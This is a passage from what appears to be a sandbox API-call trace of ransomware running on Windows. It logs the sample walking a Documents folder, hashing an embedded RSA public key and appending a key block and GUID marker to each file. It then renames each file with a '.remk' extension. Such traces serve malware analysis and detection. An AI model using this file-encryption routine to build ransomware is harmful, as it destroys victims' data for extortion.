lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17f15, lpOverlapped=0x0) returned 1 [0235.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.192] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.192] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0235.193] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.193] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.193] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.193] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.194] GetLastError () returned 0x0 [0235.194] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.194] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0235.194] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.194] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.194] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.195] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.195] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.196] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17f15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.196] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.196] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.196] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.196] CloseHandle (hObject=0x640) returned 1 [0235.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.198] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x325d3b0 [0235.198] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\cbSmrZ3jMzQOa6ad6 s.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\cbsmrz3jmzqoa6ad6 s.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\cbSmrZ3jMzQOa6ad6 s.xls.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\cbsmrz3jmzqoa6ad6 s.xls.remk")) returned 1 [0235.200] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a764890, ftCreationTime.dwHighDateTime=0x1d5e7f6, ftLastAccessTime.dwLowDateTime=0x176ac160, ftLastAccessTime.dwHighDateTime=0x1d5e2e8, ftLastWriteTime.dwLowDateTime=0x176ac160, ftLastWriteTime.dwHighDateTime=0x1d5e2e8, nFileSizeHigh=0x0, nFileSizeLow=0xa519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e5Z-XK7-M2.odp", cAlternateFileName="E5Z-XK~1.ODP")) returned 1 [0235.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.200] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\e5Z-XK7-M2.odp") returned=".odp" [0235.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\e5Z-XK7-M2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\e5z-xk7-m2.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.202] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=42265) returned 1 [0235.202] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.205] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa4f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.205] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.207] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.207] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa519, lpOverlapped=0x0) returned 1 [0235.208] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.208] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.208] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.208] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0235.209] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.209] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.209] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.209] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.209] GetLastError () returned 0x0 [0235.209] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.209] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0235.209] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.209] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.209] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.209] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.210] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.210] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.210] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa519, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.211] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.211] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.211] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.211] CloseHandle (hObject=0x640) returned 1 [0235.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.212] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325d3b0 [0235.213] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\e5Z-XK7-M2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\e5z-xk7-m2.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\e5Z-XK7-M2.odp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\e5z-xk7-m2.odp.remk")) returned 1 [0235.214] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46cb3b30, ftCreationTime.dwHighDateTime=0x1d5e50c, ftLastAccessTime.dwLowDateTime=0x9b6de280, ftLastAccessTime.dwHighDateTime=0x1d5dbae, ftLastWriteTime.dwLowDateTime=0x9b6de280, ftLastWriteTime.dwHighDateTime=0x1d5dbae, nFileSizeHigh=0x0, nFileSizeLow=0x17c64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i_O0aoNt9QXx75 z.pps", cAlternateFileName="I_O0AO~1.PPS")) returned 1 [0235.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.214] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.214] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\i_O0aoNt9QXx75 z.pps") returned=".pps" [0235.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\i_O0aoNt9QXx75 z.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\i_o0aont9qxx75 z.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.215] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=97380) returned 1 [0235.215] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.218] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17c3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.218] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.220] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17c64, lpOverlapped=0x0) returned 1 [0235.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.221] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0235.222] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.222] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.222] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.222] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.222] GetLastError () returned 0x0 [0235.222] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.222] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0235.222] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.222] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.222] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.223] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.223] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17c64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.224] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.224] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.224] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.224] CloseHandle (hObject=0x640) returned 1 [0235.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0235.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x325d3b0 [0235.226] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\i_O0aoNt9QXx75 z.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\i_o0aont9qxx75 z.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\i_O0aoNt9QXx75 z.pps.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\i_o0aont9qxx75 z.pps.remk")) returned 1 [0235.227] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bb47bd0, ftCreationTime.dwHighDateTime=0x1d5e3b3, ftLastAccessTime.dwLowDateTime=0xaa71e670, ftLastAccessTime.dwHighDateTime=0x1d5d88c, ftLastWriteTime.dwLowDateTime=0xaa71e670, ftLastWriteTime.dwHighDateTime=0x1d5d88c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OSDzZr1qU8Y-", cAlternateFileName="OSDZZR~1")) returned 1 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185cc8 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x3195950 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65eb58 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6570 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694e38 [0235.228] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9e4fe70, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xa8d48d40, ftLastAccessTime.dwHighDateTime=0x1d5d954, ftLastWriteTime.dwLowDateTime=0xa8d48d40, ftLastWriteTime.dwHighDateTime=0x1d5d954, nFileSizeHigh=0x0, nFileSizeLow=0x66b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDDJdUb3KAo.xls", cAlternateFileName="RDDJDU~1.XLS")) returned 1 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e8f8 [0235.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0235.228] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\RDDJdUb3KAo.xls") returned=".xls" [0235.228] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\RDDJdUb3KAo.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\rddjdub3kao.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 